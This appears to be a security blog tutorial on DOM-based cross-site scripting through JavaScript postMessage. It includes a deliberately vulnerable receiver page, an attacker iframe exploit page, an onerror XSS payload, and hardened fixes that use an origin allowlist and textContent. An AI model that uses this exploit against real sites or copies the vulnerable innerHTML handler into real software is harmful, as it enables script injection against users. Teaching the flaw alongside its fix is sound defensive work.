Post Message Attack

Today I will talk about postMessage in JavaScript and how it can lead to cross-site scripting in web applications.
First we need to understand what the same-origin policy is.

Same Origin Policy

Most of us have asked ourselves: what prevents JavaScript running on HOST A from reading or writing resources on HOST B?
That is the purpose of the same-origin policy. Host A cannot access resources on Host B unless all of the following match:
1. same hostname
2. same protocol (scheme)
3. same port
The following image shows what this means.

To allow cross-origin communication, CORS headers are used. I will not go through SOP and CORS headers in depth here, so let's move on to what postMessage is in JavaScript.

PostMessages

postMessage is a workaround for cross-origin communication (an alternative to XHR with CORS headers).

The postMessage method enables cross-origin communication between Window objects, for example between:

  1. a page and a pop-up that it spawned,
  2. a page and an iframe embedded within it.

The next image shows how a postMessage exchange happens between a page and an iframe from a different domain.

Now let's walk through a quick tutorial on how postMessage works.
The code below is a sample vulnerable web application.

<html>
<body>
<h1>This is a domain vulnerable to POST Message Attack which can lead to Reflected CrossSiteScripting</h1>
<p id="messageid">This paragraph will be replaced with a PostMessage</p>

<script type="text/javascript">
// Register a listener for every "message" event, whoever the sender is.
window.addEventListener("message", HandleMessage);

function HandleMessage(message){
    // No check on message.origin: any window that can reach this page may send to it.
    // message.data is concatenated into markup and written with innerHTML,
    // so a string containing HTML is parsed by the browser.
    var receivedMessage = "I received a message from domain <b>" + message.origin + "</b> and the message says <b>" + message.data + "</b>";
    document.getElementById("messageid").innerHTML = receivedMessage;
}
</script>
</body>
</html>

What is happening is that a "message" event listener is registered with addEventListener. When a message is received it is handled by the HandleMessage function, which builds a string from the message's origin and data and replaces the content of the paragraph with id messageid with it, via innerHTML.
Below is a screenshot of the front end of the vulnerable application.

So let's send this website a message from another domain, attacker.lab. As discussed previously, we can do this from either an iframe or a pop-up.
Let's examine the iframe version.

<h1>This is the attacker exploit page which loads the vulnerable site in an iframe</h1>
<script>
function SendMessage() {
  // Reference to the iframe that holds the vulnerable page.
  var IframeElement = document.getElementById('VulnerableSiteIframe');
  var message = "Hello";
  // Second argument '*' is the target origin: deliver no matter which origin is loaded in the frame.
  IframeElement.contentWindow.postMessage(message, '*');
}
</script>
<iframe id="VulnerableSiteIframe" height="400" width="1024" src="http://victim.lab/PostMessage/receiver.html" onload="SendMessage()"></iframe>

An iframe with the id VulnerableSiteIframe is created and loads the vulnerable page http://victim.lab/PostMessage/receiver.html.
Once the iframe has loaded, a function called SendMessage is executed.
The function obtains a reference to the iframe element by the id of the vulnerable website, then creates a string variable message containing the word "Hello", which is sent to the vulnerable domain with postMessage using the following syntax:
IframeElement.contentWindow.postMessage(message, '*');
The '*' target origin means the message is delivered regardless of which origin is currently loaded in the frame, i.e. any domain can receive it.

Now let's host the exploit on attacker.lab. We will find the following.

We can see that the message was received from domain attacker.lab and that the message says Hello.
So we can conclude that this can lead to DOM-based cross-site scripting. Change the message to:
var message = "<img src=x onerror=alert(document.domain);>"
Once we load the exploit page, the XSS fires.

This is because the vulnerable site accepts post messages from any domain. An if condition that checks the message origin should be in place to prevent such attacks.
The non-vulnerable code is shown below.

<html>
<body>
<h1>This is a domain vulnerable to POST Message Attack which can lead to Reflected CrossSiteScripting</h1>
<p id="messageid">This paragraph will be replaced with a PostMessage</p>

<script type="text/javascript">
window.addEventListener("message", HandleMessage);

function HandleMessage(message){
    // Only handle messages whose origin exactly matches the trusted origin.
    // The regex is anchored (^ ... $) so look-alike hostnames do not match.
    if (/^http:\/\/trusteddomain\.victim\.lab$/.test(message.origin)) {
        var receivedMessage = "I received a message from domain <b>" + message.origin + "</b> and the message says <b>" + message.data + "</b>";
        document.getElementById("messageid").innerHTML = receivedMessage;
    }
}
</script>
</body>
</html>
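The fix above relies on the origin check alone and still writes the message into the page with innerHTML, so it depends entirely on the trusted origin never forwarding markup. The following is an added example, not code from the original post, of a receiver that applies both layers: an exact-match allowlist of sender origins and a textContent write so message data is never parsed as HTML. The hostnames are the post's own lab names; the 1000-character length cap, the function names and the fake element and event objects used to run it outside a browser are assumptions made for this example.

```javascript
// Added example (not from the original post): a hardened postMessage receiver.
// The DOM is kept out of the logic so it runs and can be tested in Node:
// "element" is any object with a textContent property and "event" is any
// object with origin and data properties, exactly as a MessageEvent has.

// Exact-match allowlist of trusted sender origins (scheme + host + port).
// Hostname taken from the post's lab setup; list your own origins in practice.
const ALLOWED_ORIGINS = new Set([
  "http://trusteddomain.victim.lab",
]);

// Returns the text to display for an accepted message, or null when the
// message is rejected. Pure function, so it is easy to unit test.
function decideMessage(event, allowedOrigins = ALLOWED_ORIGINS) {
  // 1. Origin check: compare the full origin string exactly. Substring or
  //    unanchored-regex comparisons are a common mistake here.
  if (!allowedOrigins.has(event.origin)) {
    return null;
  }
  // 2. Type check: any structured-clonable value can arrive, not only strings.
  if (typeof event.data !== "string") {
    return null;
  }
  // 3. Length cap (assumed value) so a peer cannot flood the page with text.
  if (event.data.length > 1000) {
    return null;
  }
  return "I received a message from domain " + event.origin +
         " and the message says " + event.data;
}

// Builds the actual "message" listener. The text is written with textContent,
// never innerHTML, so even a trusted sender's data is rendered, not parsed.
function createMessageHandler(element, allowedOrigins = ALLOWED_ORIGINS) {
  return function handleMessage(event) {
    const text = decideMessage(event, allowedOrigins);
    if (text === null) {
      return false; // ignore silently; do not echo untrusted input anywhere
    }
    element.textContent = text;
    return true;
  };
}

// Constructed demonstration: fake paragraph and fake events, no browser needed.
function demo() {
  const paragraph = { textContent: "This paragraph will be replaced with a PostMessage" };
  const handler = createMessageHandler(paragraph);

  // Constructed event from the trusted origin: accepted.
  const accepted = handler({ origin: "http://trusteddomain.victim.lab", data: "Hello" });
  // Constructed event from another origin carrying markup: rejected before any DOM write.
  const rejected = handler({ origin: "http://attacker.lab", data: "<img src=x onerror=alert(document.domain);>" });
  // Constructed look-alike origin: a prefix or substring check would wrongly accept it.
  const lookalike = handler({ origin: "http://trusteddomain.victim.lab.attacker.lab", data: "Hello" });

  return { accepted, rejected, lookalike, shown: paragraph.textContent };
}

if (typeof window !== "undefined") {
  // In a browser: wire the hardened handler to the real paragraph from the post.
  window.addEventListener("message", createMessageHandler(document.getElementById("messageid")));
} else {
  // In Node: run the constructed demonstration.
  console.log(JSON.stringify(demo()));
}
```

On the sending side the same principle applies: pass the receiver's exact origin as the second argument of postMessage instead of '*', so the browser drops the message if the frame has navigated to a different origin.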

Finally, below is a link to a quick tutorial on postMessage in Arabic.
https://www.youtube.com/watch?v=rbHC3DHk6Vg
The source code can be downloaded here:
https://hacked0x90.net/Uploads/PostMessage.zip
